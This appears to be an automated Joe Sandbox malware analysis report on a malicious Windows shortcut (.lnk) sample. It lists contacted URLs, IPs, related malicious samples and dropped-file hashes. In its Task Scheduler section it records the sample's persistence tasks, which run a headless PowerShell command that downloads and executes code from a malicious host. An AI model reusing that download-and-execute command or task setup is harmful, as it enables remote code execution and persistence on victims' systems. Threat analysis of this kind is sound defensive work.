                                                                          https://drive.desktopserver.toppowershell.exe, 0000000B.00000002.2318160174.0000019FD4A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023345068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEDEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F3093F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://drive.desktopseXpowershell.exe, 00000016.00000002.2485510234.0000023344FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://g.live.com/odclientsettings/Prod/C:edb.log.4.drfalse
                                                                                		unknown
                                                                                http://www.microsoft.cokpowershell.exe, 00000017.00000002.2476908618.000001CCACF65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://file.io/powershell.exe, 0000000B.00000002.2318160174.0000019FD4CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD4C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEFB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://contoso.com/powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2318160174.0000019FD61FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://gateway.discord.gg:443/?v=9&encording=jsonpowershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://drive.desktpowershell.exe, 00000016.00000002.2485510234.0000023344CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30907D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                        		unknown
                                                                                        https://oneget.orgXpowershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://drive.desktopserver.top/file/res/Xpowershell.exe, 00000016.00000002.2485510234.0000023344FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://drive.desktopserver.topppowershell.exe, 00000018.00000002.2437118491.000001F30894A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2318160174.0000019FD45E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAE9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308521000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://ipwho.is/powershell.exe, 0000000B.00000002.2318160174.0000019FD4CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD4C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEFB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://gateway.discord.ggpowershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.2318160174.0000019FD45E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAE9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308521000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://gateway.discord.gg0powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://oneget.orgpowershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  104.21.92.189
                                                                                                  		drive.desktopserver.topUnited States
                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                  162.159.135.234
                                                                                                  		gateway.discord.ggUnited States
                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                  203.101.184.86
                                                                                                  		mora.gov.pkPakistan
                                                                                                  		9541CYBERNET-APCyberInternetServicesPvtLtdPKtrue
                                                                                                  239.255.255.250
                                                                                                  		unknownReserved
                                                                                                  		unknownunknownfalse
                                                                                                  142.250.184.228
                                                                                                  		www.google.comUnited States
                                                                                                  		15169GOOGLEUSfalse

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.17
                                                                                                  192.168.2.4
                                                                                                  192.168.2.5
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1522856
                                                                                                  Start date and time:2024-09-30 18:57:08 +02:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 7m 39s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:38
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:Sv6eQZzG0Z.lnk
                                                                                                  renamed because original name is a hash value
                                                                                                  Original Sample Name:21c0756d52ca7947a83529e2cc7d3341f4626b8da05c256f5ec09034d147c6ba.lnk
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.evad.winLNK@61/43@9/9
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:Failed
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .lnk

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.214.172, 216.58.206.78, 108.177.15.84, 216.58.206.67, 34.104.35.123, 184.28.90.27, 142.250.185.163, 142.250.184.238
                                                                                                  • Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: Sv6eQZzG0Z.lnk

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  12:58:07API Interceptor958x Sleep call for process: powershell.exe modified
                                                                                                  12:58:10API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                  18:58:19Task SchedulerRun new task: CleanerRes path: conhost.exe s>--headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell
                                                                                                  18:58:19Task SchedulerRun new task: DriversUpdate path: conhost.exe s>--headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell
                                                                                                  18:58:20Task SchedulerRun new task: ZGraphics path: conhost.exe s>--headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell

                                                                                                  LLM Input / Output

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  239.255.255.250http://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                      https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                        https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                          http://servicesnaustraliagov.info/adminGet hashmaliciousUnknownBrowse
                                                                                                            https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                              https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                  https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                    https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      162.159.135.234http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                        https://bafybeid655cmhe6uwb6wx3qrnokcfyddv63kcnzkm3whfn2xbjyyhukh2m.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                          http://via.evove.topGet hashmaliciousUnknownBrowse
                                                                                                                            test.exeGet hashmaliciousUnknownBrowse
                                                                                                                              windisc.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                SecuriteInfo.com.Other.Malware-gen.12648.25881.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    SecuriteInfo.com.Win64.SpywareX-gen.2363.7900.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      ChromeInstallerOnline.exeGet hashmaliciousDicrord RatBrowse
                                                                                                                                        aBtQ4Tt70g.exeGet hashmaliciousDicrord RatBrowse

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          gateway.discord.gghttps://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.136.234
                                                                                                                                          https://mjj.aigc369.com/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.133.234
                                                                                                                                          http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.136.234
                                                                                                                                          Client-built.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                          • 162.159.130.234
                                                                                                                                          Client-built.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                          • 162.159.133.234
                                                                                                                                          87Bym0x4Fy.exeGet hashmaliciousBlank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                          • 162.159.130.234
                                                                                                                                          Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                          • 162.159.134.234
                                                                                                                                          Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                          • 162.159.133.234
                                                                                                                                          QMGuBtu724.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.133.234
                                                                                                                                          Client-built.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.134.234

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          CLOUDFLARENETUShttp://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 104.21.84.213
                                                                                                                                          https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 104.21.1.169
                                                                                                                                          4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          CYBERNET-APCyberInternetServicesPvtLtdPKfirmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 124.29.195.152
                                                                                                                                          xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 58.65.218.110
                                                                                                                                          LisectAVT_2403002B_136.dllGet hashmaliciousEmotetBrowse
                                                                                                                                          • 175.107.196.192
                                                                                                                                          RiI7W2cj7p.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 175.107.255.200
                                                                                                                                          SHIPMENT-CMA CGM-1DBSIE1P-DOCX.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                          • 72.255.53.7
                                                                                                                                          SHIPMENT-CMA CGM XIAMEN-1DBSIE1PL- EX1-DOCX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 72.255.53.7
                                                                                                                                          rCjg912Ssb.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 103.213.114.223
                                                                                                                                          Scanned Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 72.255.53.7
                                                                                                                                          Newly Arrived Shipping Document.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 72.255.53.7
                                                                                                                                          RECEIPT-CARGO-00098GHG-DOCX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 72.255.53.7
                                                                                                                                          CLOUDFLARENETUShttp://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 104.21.84.213
                                                                                                                                          https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 104.21.1.169
                                                                                                                                          4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 188.114.96.3

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          28a2c9bd18a11de089ef85a160da29e4https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          http://servicesnaustraliagov.info/adminGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 40.126.32.133
                                                                                                                                          • 20.190.159.71
                                                                                                                                          • 20.12.23.50
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0esostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          file.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          3140, EUR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          7LC2izrr9u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234
                                                                                                                                          UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                          • 104.21.92.189
                                                                                                                                          • 40.113.103.199
                                                                                                                                          • 162.159.135.234

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1310720
                                                                                                                                          Entropy (8bit):0.8527825951151541
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugE:gJjJGtpTq2yv1AuNZRY3diu8iBVqFH
                                                                                                                                          MD5:CE26F801D636B318206A63E2CFF7B383
                                                                                                                                          SHA1:8A1AD4D228CA03F2AFA8690190A0B5164D09217F
                                                                                                                                          SHA-256:13C324045CB9FE03C12F29AD5973A4CB9CD2F531D95706FAB6E8431EFBA5957A
                                                                                                                                          SHA-512:6452D7983968E895DF92D76EA075CF8A83AD32687D785996C5EE099EDB74815B086CD5C28DEA6A8257BDD656D2B3185484E5B31C26F3C293421509027FB7D192
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1ad889ce, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1310720
                                                                                                                                          Entropy (8bit):0.6586185643185033
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                          MD5:02DA721269E4660D4EC68E8BFA8CF22A
                                                                                                                                          SHA1:8C185816D14A44802B3AD6B83E59FCD436934008
                                                                                                                                          SHA-256:7A8609E3CC14912C771CBE3B1ABB2CEA185EF4A9C8541619B176EBC4284C3049
                                                                                                                                          SHA-512:E004929C9A3ADC74F3A9B5F68A397B41580AB741B74C53BD1F156739A60265E9D92CE8A014D0DC44035DB96B7C7B52CECFA744CD52B76462FAF0B1A402F52E81
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...... ...............X\...;...{......................0.z..........{...:...|].h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{......................................:...|....................i.:...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16384
                                                                                                                                          Entropy (8bit):0.0814810015409336
                                                                                                                                          Encrypted:false
